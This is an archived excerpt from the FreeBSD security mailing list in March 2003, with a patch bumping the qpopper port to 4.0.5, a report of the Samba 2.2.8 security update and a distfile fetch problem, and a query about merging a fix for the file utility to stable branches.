<5.2.0.9.0.20030314153047.075d6598@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Fri, 14 Mar 2003 15:31:30 -0500 To: "Simon L. Nielsen" From: Mike Tancsa Subject: Re: Patch to qpopper port files Cc: security@FreeBSD.ORG In-Reply-To: <20030314195744.GB454@nitro.dk> References: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Strange, I thought I had sent that as well. Its in the PR anyways http://www.freebsd.org/cgi/query-pr.cgi?pr=ports/49988 --- distinfo.prev Thu Mar 13 09:55:26 2003 +++ distinfo Thu Mar 13 09:58:46 2003 @@ -1,2 +1,2 @@ -MD5 (qpopper4.0.4.tar.gz) = 77f0968cd10b0d5236114838d9f507e5 -MD5 (qpopper4.0.4-ipv6-20020502.diff.gz) = 62f6b065a040e3fbc31a720746b9efae +MD5 (qpopper4.0.5.tar.gz) = e00853280c9e899711f0b0239d3d8f86 +MD5 (qpopper4.0.5-ipv6-20030313.diff.gz) = 1d4b68ab55b95fb1d12528c505f24e5a At 08:57 PM 14/03/2003 +0100, Simon L. Nielsen wrote: >On 2003.03.13 10:15:37 -0500, Mike Tancsa wrote: > > > The diffs below to the Makefile and distinfo seem to do the trick for > > anyone wanting to grab an updated version before the port gets > > committed. This works for me, YMMV. >It looks like the distinfo change did not make it into your patch. >That could perhaps cause problem Brett Glass is having? > > > --- Makefile.prev > > +++ Makefile > > @@ -6,7 +6,7 @@ > > # > > > > PORTNAME= qpopper > > -PORTVERSION= 4.0.4 > > +PORTVERSION= 4.0.5 > > PORTREVISION= 1 > > CATEGORIES= mail ipv6 > > MASTER_SITES= ftp://ftp.qualcomm.com/eudora/servers/unix/popper/%SUBDIR%/ > > @@ -17,7 +17,7 @@ > > > > .if ${OSVERSION} >= 400014 && !defined(WITHOUT_IPV6) > > PATCH_SITES= http://www.imasy.or.jp/~ume/ipv6/ > > -PATCHFILES= qpopper4.0.4-ipv6-20020502.diff.gz > > +PATCHFILES= qpopper4.0.5-ipv6-20030313.diff.gz > > PATCH_DIST_STRIP= -p1 > > .endif > >-- >Simon L. Nielsen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 15 13: 5:11 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B902D37B401; Sat, 15 Mar 2003 13:05:08 -0800 (PST) Received: from imul.math.uni.lodz.pl (imul.math.uni.lodz.pl [212.191.65.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1008F43F3F; Sat, 15 Mar 2003 13:05:07 -0800 (PST) (envelope-from mg@fork.pl) Received: from fork.pl (imul.math.uni.lodz.pl [212.191.65.2]) by imul.math.uni.lodz.pl (Mail Transport Agent) with ESMTP id E82731F0A; Sat, 15 Mar 2003 22:03:56 +0100 (CET) Message-ID: <3E73958A.7000605@fork.pl> Date: Sat, 15 Mar 2003 22:05:14 +0100 From: Marcin Gryszkalis Organization: fork.pl User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312 X-Accept-Language: en-us, en, pl MIME-Version: 1.0 To: security at FreeBSD Cc: trevor@FreeBSD.org Subject: samba vulnerability Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi The samba team announced vulenerability in 2.2.7 and released 2.2.8 Full advisory at http://us1.samba.org/samba/whatsnew/samba-2.2.8.html There's update of ports/net/samba made on 03/15 http://www.freebsd.org/cgi/getmsg.cgi?fetch=167866+0+current/cvs-ports But I cannot fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/samba-2.2.7a-vs-2.2-20030314.diff.bz2 (the file doesn't exists) I guess it just didn't get mirrored, but - what is the *main* distfiles ftp server? The makefile is # $FreeBSD: ports/net/samba/Makefile,v 1.115 2003/03/15 10:47:12 trevor Exp $ -- Marcin Gryszkalis http://fork.pl <>< To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 15 13:22:41 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 387AD37B401; Sat, 15 Mar 2003 13:22:38 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 337F043F3F; Sat, 15 Mar 2003 13:22:37 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2FLMZrj001909; Sat, 15 Mar 2003 16:22:36 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030315162616.04f4e730@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Sat, 15 Mar 2003 16:27:37 -0500 To: freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Re: MFC of file security fix ? (was Re: Prov. patch for the file hole ISS disclosed) In-Reply-To: <5.2.0.9.0.20030313074828.07290af0@192.168.0.12> References: <20030311181452.GA59655@dragon.nuxi.com> <20030311174126.GA57179@madman.celabo.org> <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Just wondering if any decision has been made on this either way ? ---Mike At 07:49 AM 13/03/2003 -0500, Mike Tancsa wrote: >Hi, > Is there still a plan to MFC this to RELENG_4 ? > >At 10:14 AM 3/11/2003 -0800, David O'Brien wrote: >>On Tue, Mar 11, 2003 at 11:41:27AM -0600, Jacques A. Vidrine wrote: >> > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: >> > > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: >> > > >Thanks! However, this has already been fixed in -CURRENT (by import >> > > >of FILE 3.41). I do not know whether or not David plans to MFC in >> > > >time for 4.8-RELEASE. >> > > >> > > I think this should be merged into the security branches, >> > > due to possible remote exploit by third party programs that >> > > use file, such as (at the very least) amavis. >> > >> > I tend to agree. >> > >> > David? >> >>Up to you. I'm going to do an MFC for 4.8. I am not very well setup to >>test the security branches. Do you want me to just MFC exactly what I >>committed to 5-CURRENT to the 5_0 branch (it should Just Work). Same for >>the 4_7 branch. >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message > >-------------------------------------------------------------------- >Mike Tancsa, tel +1 519 651 3400 >Sentex Communications, mike@sentex.net >Providing Internet since 1994 www.sentex.net >Cambridge, Ontario Canada www.sentex.net/mike > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message